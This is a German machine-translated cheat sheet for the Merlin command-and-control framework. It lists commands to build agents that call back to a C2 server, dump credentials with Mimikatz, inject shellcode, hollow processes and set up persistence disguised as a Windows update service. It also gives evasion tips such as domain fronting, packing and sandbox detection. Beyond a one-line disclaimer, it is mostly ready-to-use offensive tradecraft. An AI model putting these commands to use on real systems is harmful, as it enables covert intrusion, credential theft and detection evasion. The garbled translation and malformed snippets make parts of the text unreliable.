Zum Inhalt

Merlin C2 Framework Cheat Sheet

generieren

Überblick

Merlin ist ein plattformübergreifender Post-Exploitation HTTP/2 Command & Control Server und Agent in Golang geschrieben. Es nutzt HTTP/2 für die Kommunikation und bietet moderne Protokoll-Ausweichfunktionen mit integriertem Daten-Jitter und Verschlüsselung.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Vorkompilierte Binäre

```bash

Download latest release for Linux

wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z

Download latest release for Windows

Download merlinServer-Windows-x64.7z from GitHub releases

Download latest release for macOS

wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Darwin-x64.7z 7z x merlinServer-Darwin-x64.7z ```_

Aufbau von Source

```bash

Install Go (version 1.19+)

git clone https://github.com/Ne0nd0g/merlin.git cd merlin make build-server make build-agent ```_

Docker Installation

```bash

Pull official Docker image

docker pull ne0nd0g/merlin

Run Merlin server in Docker

docker run -it -p 443:443 ne0nd0g/merlin ```_

Basisnutzung

Starten von Merlin Server

```bash

Start server with default settings

./merlinServer-Linux-x64

Start server with custom interface

./merlinServer-Linux-x64 -i 0.0.0.0

Start server with custom port

./merlinServer-Linux-x64 -p 8443

Start server with custom certificate

./merlinServer-Linux-x64 -crt /path/to/cert.crt -key /path/to/key.key ```_

Agent Generation

```bash

Generate Windows agent

make build-agent-windows

Generate Linux agent

make build-agent-linux

Generate macOS agent

make build-agent-darwin ```_

Befehlsnummer

Serververwaltung

| | Command | Description | | | --- | --- | | | help | Display help menu | | | | version | Show version information | | | | listeners | List active listeners | | | | agents | List connected agents | | | | sessions | Show active sessions | | | | exit | Exit Merlin server | |

Hörer Management

| | Command | Description | | | --- | --- | | | listeners | List all listeners | | | | use listener <type> | Select listener type | | | | set <option> <value> | Set listener option | | | | start | Start the listener | | | | stop | Stop the listener | | | | info | Show listener information | |

Agent Interaction

| | Command | Description | | | --- | --- | | | interact <agent-id> | Interact with agent | | | | shell <command> | Execute shell command | | | | upload <local> <remote> | Upload file to agent | | | | download <remote> <local> | Download file from agent | | | | kill | Kill the agent | | | | back | Return to main menu | |

Hörer Konfiguration

HTTP/2 Hörer

```bash

Use HTTP/2 listener

use listener http2

Configure listener options

set Interface 0.0.0.0 set Port 443 set Certificate /path/to/cert.crt set Key /path/to/key.key

Start listener

start ```_

HTTP/3 Hörer (QUIC)

```bash

Use HTTP/3 listener

use listener http3

Configure QUIC options

set Interface 0.0.0.0 set Port 443 set Certificate /path/to/cert.crt set Key /path/to/key.key

Start listener

start ```_

TCP Hörer

```bash

Use TCP listener

use listener tcp

Configure TCP options

set Interface 0.0.0.0 set Port 4444

Start listener

start ```_

BMB Hörer

```bash

Use SMB listener (Windows)

use listener smb

Configure SMB options

set Interface 0.0.0.0 set Port 445

Start listener

start ```_

Agent Configuration

HTTP/2 Agent

```bash

Build HTTP/2 agent

GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443" -o agent.exe cmd/merlinagent/main.go

Build with custom options

GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443 -X main.sleep=30s -X main.jitter=0.2" -o agent cmd/merlinagent/main.go ```_

Agent Optionen

```bash

Set communication URL

-X main.url=https://server.com:443

Set sleep interval

-X main.sleep=30s

Set jitter percentage

-X main.jitter=0.2

Set maximum retries

-X main.maxretry=7

Set user agent

-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Set proxy

-X main.proxy=http://proxy.com:8080 ```_

Post-Exploitationsbefehle

Systeminformationen

```bash

Get system information

sysinfo

Get current user

whoami

Get environment variables

env

Get network interfaces

ifconfig

Get running processes

ps ```_

Dateioperationen

```bash

List directory contents

ls /path/to/directory

Change directory

cd /path/to/directory

Create directory

mkdir /path/to/new/directory

Remove file

rm /path/to/file

Copy file

cp /source/file /destination/file

Move file

mv /source/file /destination/file ```_

Netzwerkaktivitäten

```bash

Network connections

netstat

ARP table

arp

Routing table

route

DNS lookup

nslookup domain.com

Ping host

ping 192.168.1.1 ```_

Prozessmanagement

```bash

List processes

ps

Kill process

kill

Start process

execute

Get process information

info ```_

Erweiterte Funktionen

Modulsystem

```bash

List available modules

modules

Use module

use module

Set module options

set

Run module

run

Show module info

info ```_

Eingebaute Module

```bash

Mimikatz module

use module mimikatz set Command sekurlsa::logonpasswords run

PowerShell module

use module powershell set Command Get-Process run

Assembly execution

use module executeassembly set Assembly /path/to/assembly.exe set Arguments "arg1 arg2" run ```_

Ausführen von Shellcode

```bash

Execute shellcode

use module shellcode set Shellcode run

Shellcode injection

use module shinject set PID set Shellcode run ```_

Persistenz

```bash

Registry persistence

use module persistence set Method registry set Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" set Value "Update" set Data "C:\temp\agent.exe" run

Service persistence

use module service set Name "UpdateService" set DisplayName "Windows Update Service" set BinaryPath "C:\temp\agent.exe" run ```_

Evasion Techniken

Verkehrsobfukation

```bash

Custom User-Agent

-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

Custom headers

-X main.headers="X-Custom-Header:value"

Domain fronting

-X main.url=https://cdn.example.com -X main.host=legitimate-site.com ```_

Belastbarkeit

```bash

Build with custom build tags

go build -tags="debug" -ldflags "-s -w" -o agent.exe

Use UPX packing

upx --best agent.exe

Custom encryption

-X main.psk=your-pre-shared-key ```_

Antianalyse

```bash

VM detection

use module vmdetect run

Sandbox evasion

use module sleep set Duration 60 run

Process hollowing

use module hollow set Target notepad.exe set Payload run ```_

Zertifikat Management

Erstellung von selbstgesendeten Zertifikaten

```bash

Generate certificate and key

openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

Generate with SAN

openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -config <( echo '[req]' echo 'distinguished_name = req' echo '[req]' echo 'CN = server.com' echo '[SAN]' echo 'subjectAltName = DNS:server.com,DNS:*.server.com,IP:192.168.1.100' ) ```_

Lassen Sie uns Zertifikat verschlüsseln

```bash

Install certbot

sudo apt install certbot

Generate certificate

certbot certonly --standalone -d yourdomain.com

Use certificate with Merlin

./merlinServer-Linux-x64 -crt /etc/letsencrypt/live/yourdomain.com/fullchain.pem -key /etc/letsencrypt/live/yourdomain.com/privkey.pem ```_

Operationelle Verfahren

Infrastrukturaufbau

```bash

Use redirectors

Set up nginx reverse proxy

server \\{ listen 443 ssl http2; server_name legitimate-site.com;

ssl_certificate /path/to/cert.crt;
ssl_certificate_key /path/to/key.key;

location / \\\\{
    proxy_pass https://merlin-server:443;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
\\\\}

\\} ```_

Team Operations

```bash

Multi-operator setup

Use shared database or file system

Implement proper access controls

Use separate operator certificates

```_

Protokollierung und Überwachung

```bash

Enable detailed logging

./merlinServer-Linux-x64 -debug

Monitor connections

tail -f merlin.log

Network monitoring

tcpdump -i any -w merlin_traffic.pcap port 443 ```_

Fehlerbehebung

Verbindungsprobleme

```bash

Check listener status

listeners

Test connectivity

curl -k https://server.com:443

Check certificate

openssl s_client -connect server.com:443 -servername server.com ```_

Aufgaben

```bash

Debug agent connection

Build agent with debug flags

go build -ldflags "-X main.debug=true" -o agent-debug.exe

Check agent logs

Enable verbose output in agent

```_

Leistungsfragen

```bash

Adjust sleep and jitter

-X main.sleep=10s -X main.jitter=0.1

Optimize HTTP/2 settings

Increase connection limits

Use connection pooling

```_

Zertifikat Probleme

```bash

Verify certificate

openssl x509 -in server.crt -text -noout

Check certificate chain

openssl verify -CAfile ca.crt server.crt

Test SSL configuration

sslscan server.com:443 ```_

Detektive Evasion

Netzwerkebene

  • Verwenden Sie legitime Zertifikate und Domains
  • Implementierung der richtigen HTTP/2-Konfiguration
  • Vary Kommunikationsmuster und Timing
  • Verwendung von Domain Fronting Techniken
  • Implementierung der richtigen Fehlerbehandlung

Host Level

  • Verwenden Sie legitime Prozessnamen und -pfade
  • Implement Anti-VM und Sandbox-Erkennung
  • Verwendung Prozesshohlung und Injektion
  • Verschlüsseln von Nutzlasten und Kommunikation
  • Artefakte und Protokolle reinigen

Verhalten

  • Ressourcennutzung und Netzwerkaktivität begrenzen
  • Verwenden Sie legitime Benutzervertreter und Header
  • Implementieren richtigen Schlaf und Jitter
  • Vermeiden Sie verdächtige API Anrufe
  • Verwenden Sie lebende Techniken des Landes

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Merlin C2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *